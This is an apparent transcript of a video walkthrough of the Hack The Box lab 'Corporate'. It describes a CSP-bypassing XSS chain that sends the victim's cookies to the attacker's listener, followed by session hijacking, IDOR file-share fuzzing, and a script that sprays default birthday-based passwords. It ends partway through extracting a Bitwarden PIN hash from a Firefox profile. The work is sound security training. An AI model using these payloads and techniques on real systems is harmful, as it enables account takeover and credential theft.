What's going on YouTube? This is IPSEC. I'm doing corporate from HackTheBox, which is an enormous box. If we talked about everything going on here, this intro would be 3 to 5 minutes. So we'll just talk about my favorites. It starts off with the foothold that is cross-site scripting, and the website has been hardened with content security policy headers, so it's not that easy to do cross-site scripting attacks. You have to use a meta redirect to redirect the user's browser to a different domain on the box, and on that page, you have to do a double reflective injection in order to steal cookies. After you do some other things, you get to a Mozilla backup folder that you have to extract a BitWarden data out of it in order to crack a PIN code that lets you get a multi-factor code to Git that is hosted on the box. And after some more things, you discover a backup of the server, which contains the RSA Signing Key to Proxmox, so you can forge cookies and use the Proxmox API to change the local password of the box. So with all that being said, let's just jump in. As always, I'm going to start off with an nmap, so -sc for default scripts, SV enumerate versions, -vv for double verbose. This gives us the TTL of each port. OA output all formats, put in the nmap directory and call it corporate. And then the IP address of 10.10.11.246. This can take some time to run though, so I've already ran it. Looking at the results, we have just one port open. That is HTTP on port 80, and it's running the OpenResty web app server and gives the version string. It also redirects us over to corporate.htb, so I'm going to go ahead and add this to my host file, so sudo v etc host, and then we can add 10.10.11.246 corporate.htb, and let's get rid of the HTTP. There we go. I would also be Googling around to see exactly what OpenResty web app server is with this version string to see if there's any known exploits. There's not, so I'm not going to waste time and do that in the video. So let's just go take a look at the website. So I'm going to go to corporate.htb, and what we're looking for is trying to identify exactly what this page is. It looks like it's just a single page website because as we click these links, it is scrolling down. It did have an email address up there that's also here of hello.corporate.htb and a way to start chatting. So if I do IPSEC and we click start chatting now, it directs us to support.corporate.htb. So let's go ahead and add this to a host file. So I'm going to do sudo v etc host, and then we can add support corporate.htb. Refresh this page, and it looks like we get to some type of chat system. I'm just going to respond, see if they respond back to me. I think this is just like a script, or we can wait for the message. But the first thing I always try when I can talk to someone to interact with another user is cross-site scripting, right? I'm just going to test it first with just the bold because this is easy to tell. So if I say this, it looks like they closed the chat with me as I hit enter. So let's try this again. I'm going to go to support. We can type our name. And then I'm just going to do b hello /b hello. Click send message, and we do see one of those is bolded. So we can inject HTML. So the next thing I'm going to try is JavaScript, right? Instead of doing script source, let's just do script alert 1. So this should pop up a alert box if it works, and we didn't get one. If I go over in my browser tools, we can see the reason why it did not work is because of this content security policy. So let's try this again. I'm going to do IPSEC, page block loading. I don't know if it'll give us a new one. It just says that. Alert 1. I was hoping it would just like pop up the message saying this script could not be ran because of CSP, but I don't think it's doing that. However, let's look at all the content security policy around this. To do that, I'm going to go over to Burp Suite so I can just see the headers easily. We can turn intercept on, refresh this page, send it over to repeater, and then we have the content security policy. So I'm going to copy this, and then I'm going to just open a new pane. Let's do V. I'm going to call this csp.support. And then let's format this so everyone's on a new line. I'm going to replace semicolon space with a return. And this is the content security policy. So we're allowing scripts from star.corporate.htb and corporate.htb. We also have this that's going to block us from loading scripts inline on the page. let's take a look at other domains. And while we do that, I'm going to run a GoBuster. So I'm going to do GoBuster vhost -u http support.htb wordlist op seclist discovery DNS. Let's do subdomains top 1,000,000 20,000. I think O is output. We'll call this vhost.out. Is it W? Oh, why did I say support? This is corporate. I'm probably thinking the subdomain of support, but there we go. Okay, so now that that's running, let's get all the other content security policies. So if I go over to corporate.htb, let's go web history, send this to repeater. We can grab this one. And I'm going to put at the top so we can easily see this. This is going to be support corporate HTTP. And I'll call this csp.root. Paste that. Let's do the same search and replace to replace all semicolon spaces with a new line. And I'm just going to call this corporate.htb. So we can see that bottom script source self is not there. So we can inject JavaScript on this page. And outside of that, everything else looks to be standard. So there is potentially a way for us to exploit some type of cross-site scripting inside of this. So what we could potentially do is send a HTML injection redirect over to another domain. Let's say we had cross-site scripting in corporate.htb. If we did that, then we could potentially steal cookies or do cross-site scripting attacks. So that's going to be the start of the logic of why I'm starting to look into this. But first, I want to make sure I can redirect this page somewhere else. So I'm going to click here to open a new chat. And before I click start chatting, I'm just going to type what I want in my terminal, because the agent's going to close the window in 30 seconds. Also, we probably want to keep exactly what we sent the endpoint in case it works. And we lost it just because it was in a browser, right? We have to do a HTML redirect. So that uses the meta tag. And again, the reason why we have to do this is because we can't load any JavaScript in the page. So if we do HTTP equiv refresh content, I think this is refresh in 0 seconds. And then we say URL and redirect them wherever we want. And I'm going to redirect them to my box. And the reason why I'm doing that is we validated we can inject HTML in our chat window, but the agent may use a different website in order to chat to its users, so they may not be vulnerable. If we redirect it to like Google and just test it on a browser, we don't know if we've actually attacked the agent themselves, right? So that's why I'm doing it to mine, so we can see all the requests. I'm going to start up a HTTP server, and then let's copy this payload and send it in. So if it works, my browser should redirect. Yep. And then we should also see the agent hitting the redirect as well. And we do 10, 10, 11, 2, 46. So we have validated we can do HTML injection. Now we have to find a page where we can run JavaScript, right? We did do the GoBuster. So we have a few subdomains here we could also check. But I'm just going to check corporate.htb first because this is the one we're on, right? So the first thing I want to do is kind of identify what this is built with. We have the Wapalizer here. It's not detecting any like libraries or things like that. So let's just get a 404 page because that also helps us to identify frameworks and things like that. And we get 404 not found, and it just reflects the data back to us. So what I'm going to do is inject HTML here to see if we have injection, and we do. That's good. And if we look at it, our page, we can't just run JavaScript on this, right? If I try to do a /script, let's just do script alert 1 and try running JavaScript. We can't because the page itself cannot run JavaScript. We have to include JavaScript somewhere else. It can work on any of the subdomains or corporate.htb itself. It just like, we can't just do script like that. It has to be script source is equal to something, and then that will load. So what we want to do now is see if we can find a place where we can inject into JavaScript. So what I'm going to do is go to the proxy tab, and I'm going to look at all the queries my browser sends. If we look at it, we're sending this v parameter quite often. So I'm going to highlight this, and we're going to search. And I think if I had Pro, I could just type that term there and find it, but I don't. So I'm just going to click up all the requests, and we see we got one match here. So in this assets JavaScript analytics min, it looks like we have a way to do this. So I'm going to do v is equal to ipsec. I'm going to see if ipsec is in this request, and it is. So we can put the JavaScript here. So if I did alert1 like that, let's see, we have JavaScript there. So what we want to do is load the script here. So we can do script source is equal to, that should be fine, /script. Go to load this, and we see an uncaught reference error, analytics is not defined. So this script itself, analytics min.js, may have a dependency that we have to load beforehand. I wonder if I searched under _analytics. We don't have that function. Let's see. If we go back here, there is it's either going to be in jQuery or the vendor analytics. And right at the top, I see var _analytics function e. So we want to include this file as well. And I don't think we need the v because the v doesn't appear to be doing anything. That was not my clipboard. There we go, because we don't get any matches. So we just have to include this file beforehand. So let's go back here, and we can say script source is equal to this. Wonder if I even need like the / script, or I can probably escape it that way. I don't think it liked that. Let's go back. There we go. We have the alert. So what we can't do right now, though, is inject this straight into the chat window. And the reason why is it has this script source self here, right? So we have to now wrap this into the meta redirect. So what I want to do is, let's see, let's go back here, vxss notes. I'm going to grab this. Let's see. Where's the best way to do this? I guess we can just paste it. I don't think it's going to work right off the bat because we may have to do some like URL encoding. Maybe it did it for us. I don't remember encoding it. I guess because I copied it off the browser window, it did. Weird. Let's move XS notes to www and index.html. Sure. So I want to go to 10.10.14.8, port 8000. It's going to hopefully redirect me and get that JavaScript. Awesome. So now what we want to do is be able to get cookies. So what I'm going to do is go back here. Let's go index.html. And then instead of alert1, I'm going to say, let's just change a window. Let's do another redirect. So we can do window location is equal to HTTP 10.10.14.8 8000 / plus document dot cookie. I think that's right. So let's go to 10.10.14.8. We send it. And it stopped after window location. So it doesn't look like it liked my quotation marks, is my guess. So we could change this with a different quote. One of the common ones is a backtick. That will also work. So let's go to 10.10.14.8. And that looks better. I don't like that it actually said document.cookie. And then we didn't actually go there, right? It just ended. So we probably have to encode that plus because it's probably treating that as a space maybe. So let's do echo-n plus. Then we can do jq-rr at URI. It's %2b. So let's put that plus as %2b. Okay. And I'm also, let's go into storage and make sure we have a cookie to send. So let's just add one. There we go. So if we go to 10.10.14.8, we get redirected there. That still does not seem to want to work. Let's see. So we did document cookie. We're in backticks. See, I don't know exactly what we're messing up. Oh, it's probably the equal. We probably have to URL encode that equals because we have that v equals and then this. So let's encode equal %3d. Not found. We definitely should save that in our index. I wonder if we should do the question mark as well. %3f. That's 2f, 3. That still is not working. Okay. That one worked. We didn't get a cookie though. Oh, because the path. Let's change the path to slash. So what's happening is silly because it is a redirect on index. I think it's going into a loop, but also we have to make sure we get that end double quote and then we add a slash script. There we go. That's what we wanted and we have it. So we have to figure out exactly why that's not going through. So we put this document.cookie and then this is where the script is ending. So I wonder if we need to, we need to URL encode that quote. So what is a quote? %22. I wonder if I need 2 quotes. I don't know where that one quote is coming from. I probably only need one of those. Okay. So let's go 10.10.14.8. We redirect and awesome. So now if I send this over to the support agent, I should be able to get their cookie. So I'm going to send this. We'll start chatting. We're going to redirect them. They're going to hit the corporate.htb, and then they're going to send all their cookies back to us. This is our request, but we also have their request. We have the corporate SSO cookie right here and it looks like it is a JWT. We can go to jwt.io to see this quickly. So if I do jwt.io and paste this in, we have got Nora Breck at corporate.htb, and this is her cookie. So let's go ahead and add this to our session. So let's go back to storage. This is corporate SSO. Let me make this bigger. The value, we can paste this in and then refresh to see if we get anything different. Does not look like it. Let's get off our cross-site scripting page. So nothing's different there, but there were other domains we saw. We have support, we have Git, SSO, and people. So let's edit our host file. So sudo v etc host. And then we can add Git corporate HTB, SSO corporate HTB, and people corporate HTB. So if we go to Git corporate HTB, we get forbidden. If we do SSO, we get the login form. And if we do people, we get a sign in. So let's set our cookie here. So again, I'm just going to hit F12, then go over to storage tab. Let's do a new item by clicking on the plus. Then we select the name. This is corporate SSO. I think I spelled that wrong. I think that's fine. Then let's go grab our JWT. Copy. Paste. And then the path, I want it just on slash. So now I refresh and we get over to services. So we have password reset and our people. The password reset requires current password. What I'm going to do is try doing it without knowing this. So we can do password for everything. And then let's make sure we intercept the request. Okay. Enter. Let's see, found redirect. Your current password is incorrect. So let's see if we can change this. And as I'm doing this, I don't see any like identifier where I could edit another user's password. The whole reason I was testing this was to see if I could change another user's password. Maybe there was an ID parameter here, but there isn't. And if I remove a current password, it requires it. So we don't have any type of way we can bypass that. The whole password changing thing is not really that interesting to me. Let's go to our people. And we got to turn the intercept off. And we can click sign in. And that doesn't appear to work. We have cookies. Let's just add corporate SSO here as well. Corporate SSO. Value. Paste. Path on slash. Let's see if we can access this now. Looks like we can. So we just had to manually add that cookie in. So I'm going to clean up some of my tabs. And we can begin looking at people. So let's take a look at chat, news, sharing, calendar, holidays, payroll. We probably should see like what this is coded in if we can. For some reason, this just looks like a Node.js thing to me. I'm not sure exactly why. Let's see. We are intercepting. Is there anything in the headers? Deny. I don't see anything unique here. Let's go people. If we give an error, we just get a 404 sorry. And I don't know what this is. Go to Wappalizer, no technology detected. Looking at this, we can see internal chat messages. And we can also, from here, get to employee profiles if we know the ID. So we could enumerate potential usernames, birthdays, their role, and an about. We have the news. Doesn't look like anything is too important here. We can click on this and read, but that is quite a bit of reading. We have files. It looks like a OVPN config. So that's going to be the first thing I download is this VPN config. So I'm going to go to HTTP, corporate, and we will save the VPN file. We have some documents. If we open these, I don't think they mean all that much. I don't know what that is. Discard, sure. And we could log into the VPN. I'm not going to do a lot on it because it just doesn't flow well, but I spent a lot of time enumerating this VPN. Whenever doing multiple VPNs, I always add a MSS fix to this. So I'm just going to do MSF fix 1400. And the whole reason I do this is the maximum transmission unit by default is going to be like 1489 or 1500 or something like that. And that's like how big the packet is. And OpenVPN sits after the like OS builds the packet and then adds an overhead on top of that. So since I have a VPN going to HackTheBox and then I do another VPN going to this machine, that is two like OpenVPN headers that the OS isn't expecting, and it gets some weird issues. You can go to ipsec.rocks and probably search MSS fix and go to an old machine to see it. But that's always my habit whenever layering on VPNs is lowering the MTU, the maximum transmission unit, by putting MSF fix in. So let's do sudo openvpn nora connect. And it looks like we connect right away. We do have a IP address. If I do IP route, I want to see what is ton1. So we have 10.80. So this is going to be the OpenVPN subnet. And then it's letting us route to 10.90. So let's just do an nmap. So we can do sudo nmap scsvoa. Do I want to do script? Sure, I can. We'll do nmap internal VPN and put this in. I probably should add verbose as well, because this scan may actually take a long time doing script scans on a /24, but I didn't want to look too much at the VPN anyways. I wanted to go keep looking at this web server. We can see some things coming back already, but we have a way to upload files. We also can share files. So I probably would spend a lot of time uploading file if I knew the backend framework this was. My first thought is let's go into sharing files and seeing how this works, because we may be able to find files that we don't have access to and then share them with ourselves and gain access. So that is my first thought here with this parameter. So let's see what this share request looks like. I'm going to put my email address, which I think was, let's just click on my name to get my email. Employee, it is taking its time to load because Burp Suite is intercepting. There we go. So we can copy that. Let's attempt to share. And we can't share a file with ourselves. So if we tried this, we have to find another user. And that actually isn't as hard as it sounds, because we can go back over to the support and fish someone else. So if I do ipsec, I'm going to go back and cat my XSS notes. They're probably in dub. So we want to grab this. And I'm going to go here. And we start chatting. And let's see who we're chatting with. Is it Nora again? No, this is Julio. So we're going to send that. And we have another user. So let's see if we can share files with this user. So I'm going to go in new private window so we can have two windows open simultaneously. And we can say HTTP, people, corporate, HTTP. This should load. I don't know why it's taking so long. Let's see. Is the proxy set? No proxy. Google. That works. Corporate HTTP. Okay. For some reason, it was going slow. It's fine now. Okay, I'm going to add the corporate SSO token. I don't have to add it to the SSO website first, or I can just add it here. It is at / already. Oh no, it's at auth login. Save. Corporate HTTP. It's going to login. Let's do SSO. I do not know why this browser is going slow. Is this one going slow? No. So there's something odd with this private browsing tab. Let's see, add corporate SSO, paste, get rid of /login, refresh. Does the network tab tell me? No. This is bizarre. Looks like it's something maybe DNS related. The nmap is finished. I'm going to just kill the multi-layer VPN just in case that's doing something. Okay, maybe it was trying to go through the VPN. So we can click on people. We have the corporate SSO token. Okay. I don't know why the browser is behaving as it is, but I think we're getting close. Awesome. Wait. Why am I Nora? We had someone else, right? Copy. JWT IO. That's Nora. I could have swore it said we were talking with Julio. This is my browser, 10.10.14.8. That explains some things. Okay. Storage, cookies, change this. And we also need to change this. Okay, now I'm on Julio. And we got Julio VPN. Awesome. So I want to see if I can share files with him. So let's see. I'm going to grab this. Let's get an email. I'm going to copy everything, paste it in, share file. It says it's been shared. Refresh. And we have another file. So what I want to do is examine this request. And what we want to do is try to share files that we don't own. It's probably this post right here because we have file ID. So what I'm going to do is let's copy this entire request to a file. So we can say copy to file. I'm going to say share.request. And then let's edit that. So let's go share.request. And I'm going to put fuzz where file ID is. And we can say fuff-request share request proto HTTP word list. I'm going to do a sequence of 0 through, let's do 1,000 pretty much, 999. Is there anything else we want to do? I think that's it. We see everything is status 302. Let's go back here and refresh. And we have a lot more files. And oddly enough, it says shared by the owner instead of shared by who actually shared it, which was us. But there's a lot of documents. I was looking to see if there's other VPN files. One of these should stand out as not docx. We have a Welcome to Corporate 2023 PDF. So if we look at this one, work life, I clicked it twice. This PDF talks about the default password. So we got first name dot last name at corporate.htb. And then the default password is corporate starter, and then the day, month, year, which is your birthday. And remember when we were enumerating and found the people, if we go back to, I think it was chat and click on someone's name. Let's go to chat. Click on a name. We have the birthday here. So we want to build a script that will crawl this URL, changing out the number, and then when it finds a employee, then it goes and makes a request to log in with their birthday. So let's do that. I'm going to make this called, I'm just going to make a directory called code. And then let's touch login.py. Sure. So what we have to do is first import request. And I'm waiting for VS Code to load. So I can say import request. And we also want to set our cookies. So I'm going to do cookies is equal to corporate SSO is going to be the first one. Let's see. This is the second one. And then the third cookie will be session. Okay. We can grab this value. Grab this. And grab this. Okay. So the first URL is here. And this last one is a number. So I'll do ID. And we can say for I in, I'm going to do range. And this is just, I'm going to start small. So we'll do 5,000 to 5,015 because we know there's employees there. If I started at 0, there's a chance it doesn't have employees until 5,000 and we'd just be waiting a long time. We can actually just go, this should be fine. Okay, so the first thing we want to do is make a request. And I need import requests. And let's see. I think if we give it a bad number, it redirects us, right? So how do we behave on error? Let's see. I should just not use this incognito window because that is, for some reason, the slow Firefox. If we do 1, it redirects us to /employee. So we don't want to do a redirect. So we can say redirect false. Awesome. And let's see. If response.code, status code, is equal to 200, then sure, let's print it and break. And I'm going to set a debug point here. And let's just see if this works. So it's running. It's probably hitting a few employees that don't exist. I would assume once we hit like 513 or whatever the employee was, it worked, but we didn't. Print. Sure. I should put the ID there. So we're just completely failing. That leads me to believe our cookies are bad. I guess we should look at where it's redirecting us to. If we're getting redirected to the login, which would be a bad cookie, or if we're getting redirected somewhere else. So let's see. Print response.text. That should tell us. Redirecting / employee. I'm an idiot. I called it ID, but it's I. So that should work. There we go. We have one. So 5001 is a employee. It's response 200. So now if I go to debug, if we look at response.text, it is going to be that page. So what we want to do is make a regular expression that will grab the email. So let's see. We can say email RE is equal to R. And let's say what I want to do first, we'll copy this, put it in comment. So whenever I do a regular expression, I like putting the what I'm grabbing in a comment above it. And we can look for mail to, and then I don't want to do word. You can probably say dot star, then at corporate HTB, like that. Okay. And then print email, or this would be username. And we have to import regular expressions. Run this. I have bad variable. Username, let's see, what is it? It's a list. We just want the username. So we'll grab the first one, and that should work. Okay, so now we want the birthday. So we can do birthday. Here's what we're going to search for. So that should be fine, I think. Okay. And then we need to make like the day, month, year. So that's probably born January 18th, 1996. Do I still have that PDF? Downloads, where is it? That's the docx. What is the format? Day, month, year. So this has to be the month because there's no 18th month. So we have to change the format slightly. So I'm going to do day, month, year is equal to date of birth split on /. And then we can say password is equal to corporate starter. We can F string that. And then say, what was the format? Day, day, month, month, year, year. This format actually was month, day, year. So we can say day.zfill2. So that's going to format it to be 2 digits. And then month zfill2 and year. There we go. Print password. I'm going to set a breakpoint. And we don't know this password is good or not, but we just want to be able to see it. So running through, we go to the username. That is Ward. That is an odd last name. Okay. Not enough values. So date of birth did not work. Let's go debug, DOB. It got engineer. So we want to say, let's say digit, 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 like that. Run this again. Username, well, good. Date of birth, that looks better. And then the password is going to be corporate starter 05 04 05 1971. That looks good. The numbers are different because the people we're looking at here is not Ward, whatever. We're looking at Nora. But yeah. So now what we want to do is make a login request. So we want to go to SSO and I need to log out. We can probably just log out once we get to SSO. Corporate HTTP. Log out. Doesn't look like logout works. Let's just delete the cookie. Okay. I'm just going to close that. So we want to test a login. So do test, go to burp suite, intercept on, log in. We get a 302 found with invalid in the body. So we want to now do a login. And I'm just going to create this as a function. I should have done the other thing as a function, but oh well. Do login, username, password. And then let's say URL is HTTP SSO corporate HTTP /login. Data, username, and password. That's what we need. And then send this. We don't need to send any cookies. And we can say if response.text contains if invalid is in. I forget how to do this in Python. If invalid is in response text, is it going to tell me? I don't know why I had the is there. There we go. Return true. There we go. Why is that highlighting? That should be fine. Okay, let's get rid of these prints because we just had them there for debug. And let's see. I'm going to print username, and we'll say end equal nothing. So printing the username without a line break. And then we're going to say if login, we can print the password, else we'll just print nothing. So I think that's going to work. So what we're doing, we're checking the employee page, we're pulling the employee email, pulling the date of birth, building the password string, then we're going to test the login. And if the login is successful, we're going to put the password on the terminal because we ended it previously with the user. If the login's not successful, we're just going to put a line break. So this will tell us valid employees along with the passwords. So let's send this. And it's looking like we're getting employees. So let's increase our number. Let's do 5,000 to 6,000. Hit enter. And let's see. I hope there's nothing before 5,000. It's looking like we're going. I'm not sure if we actually hit a user that should be successful or not. Looking at this, we did that case incorrectly. I wasn't sure if it was a lowercase I. But hopefully soon we'll see a colon and password. We got Nora Breck. Doesn't look like we have any. It stopped going, so that leads me to believe that we hit the end of all the generated users. So I think we may have a mistake somewhere. I want to set a break here so we can look at what response.txt is. I'm expecting it to be this, invalid username or password. Let's just send this again. Okay, debug console response.txt. Yeah. The other thing is the username could be a full email address. We don't know that piece. So what I'm going to do, we'll do 4,000 to 7,000. And in this print, I'm going to also put the ID. So it can print fstring user, and then, was it I? Yes. Okay. And I'm just going to pause the video and let this run. Okay, I just went through the entire list, and it looks like it starts at 5,001 and ends at 5,078. So we got all the users. So we can shrink that. Then we want to see exactly what this request looks like. So I'm going to do proxies is equal to HTTP. And we'll send it to localhost 8080. Okay, let's go to Burp Suite. Intercept on, run and debug, just to make sure our code is working. And I see the error. We need to put these in quotes. That is a silly mistake. There we go. So now, if we run the script again, let's go run. It should go relatively quickly because we're only giving it valid users. And there we go. Let's see if any of these come back with a valid login. And we have Elwin Jones right here. So we have one valid password. And let's just let it finish. And we'll copy all the successful ones over to a file. Or I guess I can copy everything. And we can just grep on corporate and get everyone. So there's 3. Is there anyone else? 4. And that looks like it. So let's grab this, copy. Then we can say v user enum.text, paste grep corp on this to creds.txt. So we have a few credentials. So let's go back to the welcome packet that told us the password format, because that may tell us exactly where these credentials are valid for. We could just go back and go through all the notes and look ourselves and try a bunch of places, but it's always best to refer back to the documentation. So this is where it says we've been set up an account. Here's the default password. It tells us there's a VPN pack that allows us to access the internal resources. So let's go back to the VPN pack. I'm going to connect to it. And then we also have the nmap scan that we had done. So let's less nmap then internal vpn.nmap and scroll down and let's see what we have. So 10901, that is open or up. We have SSH on port 22. The TTL is 64. And we have the open SSH banner. Then we have a web server open on port 80. This looks like the same exact banner we saw on the routable address 10.10.11.246, and it's redirecting us to corporate.htb. Now, normally when I'm trying to compare to see if 2 IP addresses are identical, I go to some cryptographic fingerprint like this and then compare it. But I think we only had 80 open on this, right? If we look at our nmap on 10.10.11.246, we only have 80. So there's no way we can really easily fingerprint to identify it as indeed the same box. We have ldap open, ldap SSL, 2049 NFS. Now I'm guessing this is only going to support NFS version 4. We see, I think this banner tells us that, but also I don't see the RPC mapper port. That's I forget what port number that is, 111 or something. So without an RPC mapper port, you can't use NFS version 2 or 3. So it's likely only 4 is going to be supported here. We also have port 3128 open, and that is saying it's a Proxmox virtual environment REST API. Proxmox is an open source VMware, so it's going to be some type of virtualization thing. And then we have 10904 and the TTL decrements. So we know 10904 is going to be a virtual machine, and it's probably going to be a Proxmox client. So we're probably using libvirt or something here. Not really that important, but it is just the type of information we can get from this. We do see 111 here. This is the RPC port. So RPC is listing here. If we go all the way up, let's see. Let's double check. I did not miss it. I did not. So we don't have RPC open there. Oddly enough, there's no NFS. And we have 22 open. So let's try our credentials to log into one of the 10.9 hosts. So I'm going to go cat. Let's do cd ... Let's see where we have it. Did I put it in code? I do. Let's move creds up 1. We can move user enum up 1 as well. If we cat creds.txt, let's see. We probably should, I guess we can use netexec. Let's do netexec ssh 10901. We can do both of them. -u Elwin Jones -p corporate starter 0404 1987. I'm going to actually do host.txt 10901 10904. And we can just replace this IP with host.text. So I'm going to test Elwin first. And we could create 2 text files of all the usernames and all the passwords and then spray everything to see if it works. But we do have shell access on 10904 as Elwin Jones. So I'm just going to test this out. So we can SSH Elwin Jones at 10904. Then corp, I mistyped that. I should probably just copy and paste. Copy this, paste, enter. There we go. And we're logged in. And we got user.txt right there. I can do find.-type f. And we see there are definitely a lot of files in this home. We have some evolution stuff, which is like a mail client. Scrolling up, we have a lot of Firefox. So we could pillage Firefox there. I also like looking at mount. And we can see right here, corporate.htb is mounted through NFS version 4. We could test out more of this NFS, like if we did a show mount-e 10904 or 1 probably, but it can't talk to it. And there's not a lot of like things we can do to NFS. And let's see, let's do SSH Elwin Jones at 10904. Log in again because hold on, because this session is just hung. So I was playing with trying to talk to NFS a lot and eventually found out the reason we can't is because of IP tables. And if you look at Etsy IP tables rules v4, this is where it saves it. And we can see there is a rule that prevents anyone other than root from hitting 2049 on the remote host. Now, we could try like an SSH tunnel. Like this was one of my first thoughts. So we can do 2049, 127. This is 1090. Whoops, 10901. So we could try this. And if we do NC, what is it? ZV 127.001.2049. SSH complains that the connection is refused. So we can't connect over SSH either. And I thought maybe we could here because SSH, the parent process, is running as root. So if it didn't do the fork correctly as the user with this tunnel, there was a chance that the packet left as root and we could like talk to NFS through an SSH tunnel, but that is not the case. So we're left with trying to figure out what else we can do. Now, the Firefox profile was interesting. So let's go into that. Let's see, which one do we think has more data? I'm going to do find tier 2, wc-l 106, find ye, wcl 2. So I'm going to do the tier 2 profile just because it has a lot more files in it. And let's see, I think it's like places. Yeah, let's do SQLite 3, places SQLite. We don't even have SQLite on this box. I'm going to copy up this whole profile. So let's do a tar cjvf mozilla.tar.bz2.mozilla. And then we want to copy this. I'm going to copy it the lazy way, and we'll just move Mozilla to dev shm, go there, and start up a web server. We probably should use SCP to copy it, but I don't feel like typing that password again or copy and pasting. So that's why I'm doing it this way. So 10904, 8000, Mozilla, tar, bz2. Probably need HTTP. And then let's make dir, we did the .mozilla folder, so that should be fine. xjvf, Mozilla. Okay. So now we can start looking at this. We wanted to go in the default release. SQLite 3, places. If we do .dump, we can easily see a lot of the data. It's a bit hard to view. I just like doing this to confirm we do indeed have data. So let's see. Moz places. What is the format of this? So let's get the URL and title of that. So we can do select URL title from Moz places and see what's here. So they went to Firefox. This is probably like the home page. We have Ubuntu. Added a question there. They're searching for BitWarden Firefox extension. Looks like they're going to add BitWarden. And then they're doing a search saying, is a 4-digit PIN enough for BitWarden? We see that right there. So it looks like they have installed BitWarden in this Firefox profile. So if we want to look at BitWarden, that's going to be within the storage, and then you go default. And the actual extension itself is probably going to be this Mozilla extension. We could go https bitwarden.com. Is that a directory code ls? And then SQLite data.dump. And there's not really that much data in this one. The extensions are the Moz. And let's see, we have the SQLite right here. So if I do SQLite 3 on this, we can do a .dump, and it stores everything in blobs. And this is SQLite just showing us it is indeed a blob. There's a lot of data right here. We could view this in like a hex editor. So if we do xxd on that file less, it's an easy way to show the blob. So we can start looking around this. Let's see, what was that? Web storage extension, local data. This looks like it is some type of hashes. Oh, we saw, I thought. Maybe not. Scrolling down. I'm going to hide everything that's blank. So I'm going to do this. grep-v on all those dots. I wonder if I need to escape them. Yes, I do. That's annoying. Let's escape all these. I should have just done all the zeros, but there we go. So now we hid every blank row, so we don't have to scroll as much. So right here, we do have some type of login. And this looks like a hash. This is probably talking about the algorithm that's protecting it. We have symmetric and then a blob there. There's the private key probably and another potential password. And right here is very interesting. We have potentially a hash here and it says PinProtect, and then we have this star. If we scroll up, we can see more data around it. And this whole data is kind of clunky because it is also compressed, I believe. So if we wanted to fully read it, we'd have to uncompress this stream because we have like Elwin John email. This is by elwinjohn@corporate.hdb, but compression is making it hard to read with XXD. So what I'm going to do is let's uncompress this stream and then view it. We could probably just extract this hash easily. I noticed this is encoded differently. This is probably 16-bit while everything else is 8-bit because we have the periods between it, which is just going to be a blank thing. So 44 is D, and then we have that, right? If we look at other hashes, it's not like that. So if that's the only thing that's the only hash that is encoded that way in this blob, you could easily view it with strings, right? Because if we do man strings, look at -E, we have encoding options. We want to probably do, where is it? This 16-bit little endian is how that looked like it was encoded. So if we did strings -el on this file, we can get the hash, right? So that 2dx, this is probably the same exact thing as we had saw. 2dxg. Let's go back here, search for pin. I thought it was PinProtect. Weird. Let's see if we can find that quickly. That's private. I don't know why my search for pin did not cover that. That's weird. But we have 2dxg. So that is the same hash, right? We could try to start progressing that way, but I want to convert this into files so we can be sure that like any of that compression didn't screw up grabbing the hash. And there may be other data around this key that is interesting to us. So let's start off with grabbing the file name. And I may actually not convert it to a file. I may just do it all in the Python interpreter because I think we can play around with the data a bit better if we do it this way. But first, we have to import SQLite. And then we want to connect to this. So we'll do connection is equal to SQLite3, connect, specify the file name. Then you want to create the cursor for SQLite. Cursor like that. And we need to view the tables because we need to know what we want to extract. So let's go back there. Let's do SQLite3, 364.SQLite.dump. And let's see. I'm going to go up to the top. We want this, what is it? Object data. And what do we want? We probably don't care about the key. Index data, file. We probably want data, right? Data sounds like what we want to extract. So I'm going to do cursor.execute, select data from object data, and we want to create all the rows. So I'm just going to create a list for a row in cursor. We're going to data append row. So now if I just do data, we have everything. I can do data 0, get the first row. Looks like we have, do we have 2 entries? Nope, just 1. So we have all of this. And this is the data that I think is compressed. This header doesn't match anything that I know of compression, but if we view it, we can do import, is it hexdump? Yep, hexdump.hexdump on the data. Right, so when we view this, I'm expecting this to be somewhat like a serialized string. Let's go back, search for pin, because this gets us to where we want. Where's like email, right? I expect this to be the actual email. Since it's just gibberish, my guess is it's compressed, right? We have other thing like has personal email. This is probably a Boolean, but this is just serialized data, it looks like. And since this stuff doesn't look correct, I assume it's compressed. One of the popular compression or decompression things is called Snappy. So we can import Snappy. And if you don't have it, Python Snappy decompress. I think it's Python-Snappy you install through pip. This is it. Let's see. Yeah, Python-Snappy. So you do pip install Python-Snappy to download it. But we can do a snappy.decompress. And then let's also do hexdump, and view. This looks much better. We still have a lot of dots, but the gibberish has kind of gone away, right? Let's go back up to where email is. When we look at email, we actually have Elwyn Jones. I don't know if this is the right one. There's probably multiple emails. Let's search for pin so we get exactly what we want. So that's PinProtected right here. So this is the data we were looking at. Then we go up. We have password testing, password testing server -corporate.local 8000. This is probably going to be like the BitWarden address, I would assume. We can see other things. Let's see. Key hash. There's Elwin Jones is the email. We have iterations. And if we look at iterations, we don't see a number. We just see this. And I want to say, where is this on the stream? Let's see. We do a bunch of zeros. And then, is this the iteration count? I think this is going to be iterations right there. I'm going to make a note of that. Let's just do it in corporate v crypto notes. Where's iterations? I'm just going to copy the whole line. Just in case I'm wrong there, but I think it's CO2709, and we'll convert that back to decimal shortly. There's the email. Email Elwin Jones at corporate HTB. And you can view all the data here, right? So I'm focusing around this one hash just because it's next to PinProtected. If I search the entire blob, I don't see anything else PinProtected. So it's probably not protected by the pin code. We could look at other data in this because it had multiple rows. That looks like some UUID. I don't know what these rows are. This looks like maybe just information about like the user, or not even user, maybe the plugin. I don't see anything like identifying the user there, but that's all the data. So this is the important data we want. If we wanted to extract the hash, we could either use Python to grab it, but I'm going to do something slightly different. So we just have this, and I want to get this string into a file. I know the easy way would just be like file is equal to file.open, file name, write it as binary. But if you just have a hex dump, you can also just extract that to a file. So if we do v, I'm going to call this data.hex, we're going to paste all that. And I want to remove all the spaces up until line break. So I just want to, I trimmed the trailing space, and we have this hex dump. Do I have everything? We start at line 5, so yes, we do. So if I wanted to reverse this, I can just do hex dump -r-p data.hex, or is it xxd? My bad, not hex dump. There we go. And we have the hash. So this matches with the strings -l we had just done. But yeah. Where's my crypto notes? We have it in 6, probably. And we'll say pin protected hash. There. Awesome. So we'll write that and get rid of this. I'll leave this interpreter open just in case we want to go back to the data at all. But this gets us where we want. Let's see. Let's go up 2 directories, up again. One more directory, I think. More. Okay. So now we actually want to open Firefox with BitWarden. And now we can kill Firefox. And I'm going to go 